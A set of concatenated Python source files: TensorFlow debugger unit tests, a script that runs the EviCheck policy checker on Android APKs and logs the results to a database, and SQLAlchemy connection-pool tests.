self.assertEqual(1, dump1.core_metadata.global_step)
self.assertGreaterEqual(dump1.core_metadata.session_run_index, 0)
self.assertEqual(0, dump1.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump1.core_metadata.input_names)
self.assertEqual([x.name], dump1.core_metadata.output_names)
self.assertEqual([], dump1.core_metadata.target_nodes)
shutil.rmtree(self._dump_root)
# Calling run() with the same feed, same output and same debug watch
# options should increment both session_run_index and
# executor_step_index.
_, dump2 = self._debug_run_and_get_dump(
sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=2)
self.assertEqual(2, dump2.core_metadata.global_step)
self.assertEqual(dump1.core_metadata.session_run_index + 1,
dump2.core_metadata.session_run_index)
self.assertEqual(dump1.core_metadata.executor_step_index + 1,
dump2.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump2.core_metadata.input_names)
self.assertEqual([x.name], dump2.core_metadata.output_names)
self.assertEqual([], dump2.core_metadata.target_nodes)
shutil.rmtree(self._dump_root)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options, sess.graph, debug_urls=self._debug_urls(), global_step=3)
# Calling run() with a different output should increment
# session_run_index, but not executor_step_index.
_, dump3 = self._debug_run_and_get_dump(
sess, y, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=3)
self.assertEqual(3, dump3.core_metadata.global_step)
self.assertEqual(dump2.core_metadata.session_run_index + 1,
dump3.core_metadata.session_run_index)
self.assertEqual(0, dump3.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump3.core_metadata.input_names)
self.assertEqual([y.name], dump3.core_metadata.output_names)
self.assertEqual([], dump3.core_metadata.target_nodes)
def testDebuggingDuringOpError(self):
"""Test the debug tensor dumping when error occurs in graph runtime."""
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32, name="mismatch/ph")
x = array_ops.transpose(ph, name="mismatch/x")
m = constant_op.constant(
np.array(
[[1.0, 2.0]], dtype=np.float32), name="mismatch/m")
y = math_ops.matmul(m, x, name="mismatch/y")
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=self._debug_urls())
with self.assertRaises(errors.OpError):
sess.run(y,
options=run_options,
feed_dict={ph: np.array([[-3.0], [0.0]])})
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertGreaterEqual(dump.core_metadata.session_run_index, 0)
self.assertGreaterEqual(dump.core_metadata.executor_step_index, 0)
self.assertEqual([ph.name], dump.core_metadata.input_names)
self.assertEqual([y.name], dump.core_metadata.output_names)
self.assertEqual([], dump.core_metadata.target_nodes)
# Despite the fact that the run() call errored out and partition_graphs
# are not available via run_metadata, the partition graphs should still
# have been loaded from the dump directory.
self.assertTrue(dump.loaded_partition_graphs())
m_dumps = dump.watch_key_to_data("mismatch/m:0:DebugIdentity")
self.assertEqual(1, len(m_dumps))
self.assertAllClose(np.array([[1.0, 2.0]]), m_dumps[0].get_tensor())
x_dumps = dump.watch_key_to_data("mismatch/x:0:DebugIdentity")
self.assertEqual(1, len(x_dumps))
self.assertAllClose(np.array([[-3.0, 0.0]]), x_dumps[0].get_tensor())
def testDebugNumericSummaryOnInitializedTensorGivesCorrectResult(self):
with session.Session() as sess:
a = variables.Variable(
[
np.nan, np.nan, 0.0, 0.0, 0.0, -1.0, -3.0, 3.0, 7.0, -np.inf,
-np.inf, np.inf, np.inf, np.inf, np.inf, np.inf, np.nan, np.nan
],
dtype=np.float32,
name="numeric_summary/a")
b = variables.Variable(
[0.0] * 18, dtype=np.float32, name="numeric_summary/b")
c = math_ops.add(a, b, name="numeric_summary/c")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(
sess, c, debug_ops=["DebugNumericSummary"])
self.assertTrue(dump.loaded_partition_graphs())
self.assertAllClose([[
1.0, 18.0, 4.0, 2.0, 2.0, 3.0, 2.0, 5.0, -3.0, 7.0, 0.85714286,
8.97959184, 1.0, 1.0, 18.0
]], dump.get_tensors("numeric_summary/a/read", 0, "DebugNumericSummary"))
def testDebugNumericSummaryOnUninitializedTensorGivesCorrectResult(self):
with session.Session() as sess:
a = variables.Variable(
[42], dtype=np.float32, name="numeric_summary_uninit/a")
_, dump = self._debug_run_and_get_dump(
sess, a.initializer, debug_ops=["DebugNumericSummary"])
self.assertTrue(dump.loaded_partition_graphs())
# DebugNumericSummary output should reflect the uninitialized state of
# the watched tensor.
numeric_summary = dump.get_tensors("numeric_summary_uninit/a", 0,
"DebugNumericSummary")[0]
self.assertAllClose([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
numeric_summary[0:8])
# Check dtype (index 12), ndims (index 13) and dimension sizes (index
# 14+).
self.assertAllClose([1.0, 1.0, 1.0], numeric_summary[12:])
self.assertTrue(np.isinf(numeric_summary[8]))
self.assertGreater(numeric_summary[8], 0.0)
self.assertTrue(np.isinf(numeric_summary[9]))
self.assertLess(numeric_summary[9], 0.0)
self.assertTrue(np.isnan(numeric_summary[10]))
self.assertTrue(np.isnan(numeric_summary[11]))
def testDebugNumericSummaryFailureIsToleratedWhenOrdered(self):
with session.Session() as sess:
a = variables.Variable("1", name="a")
b = variables.Variable("3", name="b")
c = variables.Variable("2", name="c")
d = math_ops.add(a, b, name="d")
e = math_ops.add(d, c, name="e")
n = parsing_ops.string_to_number(e, name="n")
m = math_ops.add(n, n, name="m")
sess.run(variables.global_variables_initializer())
# Using DebugNumericSummary on sess.run(m) with the default
# tolerate_debug_op_creation_failures=False should error out due to the
# presence of string-dtype Tensors in the graph.
run_metadata = config_pb2.RunMetadata()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary"],
debug_urls=self._debug_urls())
with self.assertRaises(errors.FailedPreconditionError):
sess.run(m, options=run_options, run_metadata=run_metadata)
# Using tolerate_debug_op_creation_failures=True should get rid of the
# error.
m_result, dump = self._debug_run_and_get_dump(
sess, m, debug_ops=["DebugNumericSummary"],
tolerate_debug_op_creation_failures=True)
self.assertEqual(264, m_result)
# The integer-dtype Tensors in the graph should have been dumped
# properly.
self.assertIn("n:0:DebugNumericSummary", dump.debug_watch_keys("n"))
self.assertIn("m:0:DebugNumericSummary", dump.debug_watch_keys("m"))
def testDebugNumericSummaryInvalidAttributesStringAreCaught(self):
with session.Session() as sess:
a = variables.Variable(10.0, name="a")
b = variables.Variable(0.0, name="b")
c = variables.Variable(0.0, name="c")
x = math_ops.divide(a, b, name="x")
y = math_ops.multiply(x, c, name="y")
sess.run(variables.global_variables_initializer())
run_metadata = config_pb2.RunMetadata()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"1 attribute key\(s\) were not valid for debug node "
r"__dbg_a:0_0_DebugNumericSummary: foo"):
sess.run(y, options=run_options, run_metadata=run_metadata)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0; bar=false)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"2 attribute key\(s\) were not valid for debug node "
r"__dbg_a:0_0_DebugNumericSummary:"):
sess.run(y, options=run_options, run_metadata=run_metadata)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0; mute_if_healthy=true)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"1 attribute key\(s\) were not valid for debug node "
r"__dbg_a:0_0_DebugNumericSummary: foo"):
sess.run(y, options=run_options, run_metadata=run_metadata)
def testDebugNumericSummaryMuteOnHealthyMutesOnlyHealthyTensorDumps(self):
with session.Session() as sess:
a = variables.Variable(10.0, name="a")
b = variables.Variable(0.0, name="b")
c = variables.Variable(0.0, name="c")
x = math_ops.divide(a, b, name="x")
y = math_ops.multiply(x, c, name="y")
sess.run(variables.global_variables_initializer())
# Here, validate=False is necessary to avoid causality check error.
# TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
# debug ops with mute_if_healthy=false attribute during validation.
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=["DebugNumericSummary(mute_if_healthy=true)"],
validate=False)
self.assertEqual(2, dump.size)
self.assertAllClose([[
1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, np.inf, -np.inf, np.nan,
np.nan, 1.0, 0.0
]], dump.get_tensors("x", 0, "DebugNumericSummary"))
self.assertAllClose([[
1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, np.inf, -np.inf, np.nan,
np.nan, 1.0, 0.0
]], dump.get_tensors("y", 0, "DebugNumericSummary"))
# Another run with the default mute_if_healthy (false) value should
# dump all the tensors.
shutil.rmtree(self._dump_root)
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=["DebugNumericSummary()"])
self.assertEqual(8, dump.size)
def testDebugNumericSummaryMuteOnHealthyAndCustomBoundsWork(self):
with session.Session() as sess:
a = variables.Variable([10.0, 10.0], name="a")
b = variables.Variable([10.0, 2.0], name="b")
x = math_ops.add(a, b, name="x") # [20.0, 12.0]
y = math_ops.divide(x, b, name="y") # [2.0, 6.0]
sess.run(variables.global_variables_initializer())
# Here, validate=False is necessary to avoid causality check error.
# TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
# debug ops with mute_if_healthy=false attribute during validation.
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=[
"DebugNumericSummary(mute_if_healthy=true; upper_bound=11.0)"],
validate=False)
self.assertEqual(1, dump.size)
self.assertAllClose([[
1.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 12.0, 20.0, 16.0, 16.0, 1.0,
1.0, 2.0]], dump.get_tensors("x", 0, "DebugNumericSummary"))
def testDebugQueueOpsDoesNotErrorOut(self):
with session.Session() as sess:
q = data_flow_ops.FIFOQueue(3, "float", name="fifo_queue")
q_init = q.enqueue_many(([101.0, 202.0, 303.0],), name="enqueue_many")
_, dump = self._debug_run_and_get_dump(sess, q_init)
self.assertTrue(dump.loaded_partition_graphs())
fifo_queue_tensor = dump.get_tensors("fifo_queue", 0, "DebugIdentity")[0]
self.assertIsInstance(fifo_queue_tensor,
debug_data.InconvertibleTensorProto)
self.assertTrue(fifo_queue_tensor.initialized)
self.assertAllClose(
[101.0, 202.0, 303.0],
dump.get_tensors("enqueue_many/component_0", 0, "DebugIdentity")[0])
def testLookUpNodePythonTracebackWorks(self):
with session.Session() as sess:
u_init = constant_op.constant(10.0)
u = variables.Variable(u_init, name="traceback/u")
v_init = constant_op.constant(20.0)
v = variables.Variable(v_init, name="traceback/v")
w = math_ops.multiply(u, v, name="traceback/w")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, w)
# Prior to setting the Python graph, attempts to do traceback lookup
# should lead to exceptions.
with self.assertRaisesRegexp(
LookupError, "Python graph is not available for traceback lookup"):
dump.node_traceback("traceback/w")
dump.set_python_graph(sess.graph)
# After setting the Python graph, attempts to look up nonexistent nodes
# should lead to exceptions.
with self.assertRaisesRegexp(KeyError,
r"Cannot find node \"foo\" in Python graph"):
dump.node_traceback("foo")
# Lookup should work with node name input.
traceback = dump.node_traceback("traceback/w")
self.assertIsInstance(traceback, list)
self.assertGreater(len(traceback), 0)
for trace in traceback:
self.assertIsInstance(trace, tuple)
# Lookup should also work with tensor name input.
traceback = dump.node_traceback("traceback/w:0")
self.assertIsInstance(traceback, list)
self.assertGreater(len(traceback), 0)
for trace in traceback:
self.assertIsInstance(trace, tuple)
class DebugConcurrentRunCallsTest(test_util.TensorFlowTestCase):
"""Test for debugging concurrent Session.run() calls."""
def _get_concurrent_debug_urls(self):
"""Abstract method to generate debug URLs for concurrent debugged runs."""
raise NotImplementedError(
"_get_concurrent_debug_urls is not implemented in the base test class")
def testDebugConcurrentVariableUpdates(self):
if test.is_gpu_available():
self.skipTest("No testing concurrent runs on a single GPU.")
with session.Session() as sess:
v = variables.Variable(30.0, name="v")
constants = []
for i in xrange(self._num_concurrent_runs):
constants.append(constant_op.constant(1.0, name="c%d" % i))
incs = [
state_ops.assign_add(
v, c, use_locking=True, name=("inc%d" % i))
for (i, c) in enumerate(constants)
]
sess.run(v.initializer)
concurrent_debug_urls = self._get_concurrent_debug_urls()
def inc_job(index):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options, sess.graph, debug_urls=concurrent_debug_urls[index])
for _ in xrange(100):
sess.run(incs[index], options=run_options)
inc_threads = []
for index in xrange(self._num_concurrent_runs):
inc_thread = threading.Thread(target=functools.partial(inc_job, index))
inc_thread.start()
inc_threads.append(inc_thread)
for inc_thread in inc_threads:
inc_thread.join()
self.assertAllClose(30.0 + 1.0 * self._num_concurrent_runs * 100,
sess.run(v))
all_session_run_indices = []
for index in xrange(self._num_concurrent_runs):
dump = debug_data.DebugDumpDir(self._dump_roots[index])
self.assertTrue(dump.loaded_partition_graphs())
v_data = dump.get_tensors("v", 0, "DebugIdentity")
self.assertEqual(100, len(v_data))
# Examine all the core metadata files
core_metadata_files = glob.glob(
os.path.join(self._dump_roots[index], "_tfdbg_core*"))
timestamps = []
session_run_indices = []
executor_step_indices = []
for core_metadata_file in core_metadata_files:
with open(core_metadata_file, "rb") as f:
event = event_pb2.Event()
event.ParseFromString(f.read())
core_metadata = (
debug_data.extract_core_metadata_from_event_proto(event))
timestamps.append(event.wall_time)
session_run_indices.append(core_metadata.session_run_index)
executor_step_indices.append(core_metadata.executor_step_index)
all_session_run_indices.extend(session_run_indices)
# Assert that executor_step_index increases by one at a time.
executor_step_indices = zip(timestamps, executor_step_indices)
executor_step_indices = sorted(
executor_step_indices, key=lambda x: x[0])
for i in xrange(len(executor_step_indices) - 1):
self.assertEquals(executor_step_indices[i][1] + 1,
executor_step_indices[i + 1][1])
# Assert that session_run_index increases monotonically.
session_run_indices = zip(timestamps, session_run_indices)
session_run_indices = sorted(session_run_indices, key=lambda x: x[0])
for i in xrange(len(session_run_indices) - 1):
self.assertGreater(session_run_indices[i + 1][1],
session_run_indices[i][1])
# Assert that the session_run_indices from the concurrent run() calls are
# all unique.
self.assertEqual(len(all_session_run_indices),
len(set(all_session_run_indices)))
if __name__ == "__main__":
googletest.main()
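# Illustrative note (editor's addition, not part of the test suite): the debug_ops
# strings exercised above encode per-op attributes inside parentheses, separated by
# semicolons, e.g.
#   debug_utils.watch_graph(
#       run_options, sess.graph,
#       debug_ops=["DebugNumericSummary(mute_if_healthy=true; upper_bound=11.0)"],
#       debug_urls=debug_urls)
# Unknown attribute keys (such as "foo" or "bar" above) trigger the
# FailedPreconditionError that the attribute-validation tests assert on.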
|
runEviCheck.py
|
# MK Jul 2016
import logging.config
logging.config.fileConfig('logging.conf')
logger = logging.getLogger('runner')
import subprocess
import re
from db.Certificates import Certificates
from db.Apps import Apps
from db.Malware import Malware
# initialize configuration parser
import ConfigParser
from multiprocessing import Process
config = ConfigParser.RawConfigParser()
config.read('config.prop')
# get configuration parameter
eviscript = config.get('tools', 'evi.script.file')
evipolicy = config.get('tools', 'evi.policy.file')  # policy-file key; name assumed, must not reuse evi.script.file
path = config.get('apps', 'apps.fs.dir')
def evicheck(appslist):
"""
runs the EviCheck tool on a list of apps and stores results
as log files and database entries
:param appslist:
:return:
"""
p_result = re.compile(".*Policy valid!.*")
for apk in appslist:
app = Apps()
app.path_to_apk = apk[1]
app.package = apk[0]
certFile = path + app.package + "/EviCheck.cert"
logFile = path + app.package + "/EviCheck.log"
logger.info("%s running EviCheck", app.package)
malware = Malware()
malware.package = app.package
malware.logfile = logFile
malware.tool = "EviCheck"
cmd = ["python", eviscript, "-f", app.path_to_apk, "-g", "-p", evipolicy, "-t", certFile,
"-m"] # there are RSA and DSA certificates; cater for both
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if err:
logger.error(err)
continue
else:
lines = out.splitlines()
log = open(logFile, 'w')
log.write(out)  # splitlines() strips newlines, so writing the raw output keeps one result per line
log.close()
a = None  # result flag for the policy check
for line in lines:
a = p_result.match(line)
if a:
malware.result = "valid"
logger.info("%s is valid", app.package)
break
if not a:
malware.result = "invalid"
logger.info("%s is not valid", app.package)
malware.insert()
# just a helper function
def chunkify(lst,n):
return [ lst[i::n] for i in xrange(n) ]
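# Illustrative example (editor's addition): chunkify deals the list out round-robin
# into n interleaved sub-lists rather than contiguous blocks, e.g.
#   chunkify([1, 2, 3, 4, 5], 2) -> [[1, 3, 5], [2, 4]]
# which is fine here because each sub-list is processed independently.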
def do():
"""
runs EviCheck in multiple worker processes
:return:
"""
# get all apks which are linked in the database
# will come with [0] package [1] path_to_apk
appsList = Apps().getAllApps()
threads = []
for sublist in chunkify(appsList, 4):  # 'sublist' avoids shadowing the builtin list
p = Process(target=evicheck, args=(sublist,))
logger.info("starting EviCheck process %s", p)
threads += [p]
p.start()
for t in threads:
t.join()
|
test_pool.py
|
import threading
import time
from sqlalchemy import pool, select, event
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing.util import gc_collect, lazy_gc
from sqlalchemy.testing import eq_, assert_raises, is_not_
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.mock import Mock, call
def MockDBAPI():
def cursor():
while True:
yield Mock()
def connect():
while True:
yield Mock(cursor=Mock(side_effect=cursor()))
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect())
db = Mock(connect=Mock(side_effect=connect()),
shutdown=shutdown, _shutdown=False)
return db
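# Illustrative usage (editor's sketch, not part of the test suite): each connect()
# call yields a fresh Mock connection whose cursor() is also a Mock, and
# shutdown(True) swaps connect() for one that raises, which the reconnect tests rely on:
#   db = MockDBAPI()
#   conn = db.connect('foo.db')      # Mock connection; conn.cursor() works
#   db.shutdown(True)
#   db.connect('foo.db')             # raises Exception("connect failed")
#   db.shutdown(False)               # restores working connections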
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
**kw)
class PoolTest(PoolTestBase):
def test_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=True)
c1 = manager.connect('foo.db')
c2 = manager.connect('foo.db')
c3 = manager.connect('bar.db')
c4 = manager.connect("foo.db", bar="bat")
c5 = manager.connect("foo.db", bar="hoho")
c6 = manager.connect("foo.db", bar="bat")
assert c1.cursor() is not None
assert c1 is c2
assert c1 is not c3
assert c4 is c6
assert c4 is not c5
def test_manager_with_key(self):
dbapi = MockDBAPI()
manager = pool.manage(dbapi, use_threadlocal=True)
c1 = manager.connect('foo.db', sa_pool_key="a")
c2 = manager.connect('foo.db', sa_pool_key="b")
c3 = manager.connect('bar.db', sa_pool_key="a")
assert c1.cursor() is not None
assert c1 is not c2
assert c1 is c3
eq_(dbapi.connect.mock_calls,
[
call("foo.db"),
call("foo.db"),
]
)
def test_bad_args(self):
manager = pool.manage(MockDBAPI())
manager.connect(None)
def test_non_thread_local_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def testthreadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def testthreadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
dbapi = MockDBAPI()
for p in pool.QueuePool(creator=dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(creator=dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
is_not_(c.connection, c2.connection)
assert not c2.info
assert 'foo2' in c.info
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append('R')
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append('C')
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append('CL')
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ['R', 'CL', 'R'])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ['R', 'CL', 'R'])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R'])
def test_null_pool(self):
self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL'])
def test_static_pool(self):
self._do_test(pool.StaticPool, ['R', 'R'])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append('first_connect')
event.listen(p, 'first_connect', first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append('connect')
event.listen(p, 'connect', connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append('checkout')
event.listen(p, 'checkout', checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append('checkin')
event.listen(p, 'checkin', checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append('reset')
event.listen(p, 'reset', reset)
return p, canary
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
eq_(canary, ['connect'])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
eq_(canary, ['checkout'])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['reset'])
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ['checkin'])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
c2.close()
eq_(canary, ['checkin', 'checkin'])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, 'connect', listen_one)
event.listen(engine.pool, 'connect', listen_two)
event.listen(engine, 'connect', listen_three)
event.listen(engine.__class__, 'connect', listen_four)
engine.execute(select([1])).close()
eq_(
canary,
["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, 'connect', listen_one)
event.listen(pool.QueuePool, 'connect', listen_two)
event.listen(pool.SingletonThreadPool, 'connect', listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class DeprecatedPoolListenerTest(PoolTestBase):
@testing.requires.predictable_gc
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners(self):
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(innerself, conn, fconn, cout, cin):
eq_(len(innerself.connected), conn)
eq_(len(innerself.first_connected), fconn)
eq_(len(innerself.checked_out), cout)
eq_(len(innerself.checked_in), cin)
def assert_in(innerself, item, in_conn, in_fconn,
in_cout, in_cin):
self.assert_((item in innerself.connected) == in_conn)
self.assert_((item in innerself.first_connected) == in_fconn)
self.assert_((item in innerself.checked_out) == in_cout)
self.assert_((item in innerself.checked_in) == in_cin)
def inst_connect(self, con, record):
print("connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print("first_connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print("checkout(%s, %s, %s)" % (con, record, proxy))
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print("checkin(%s, %s)" % (con, record))
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
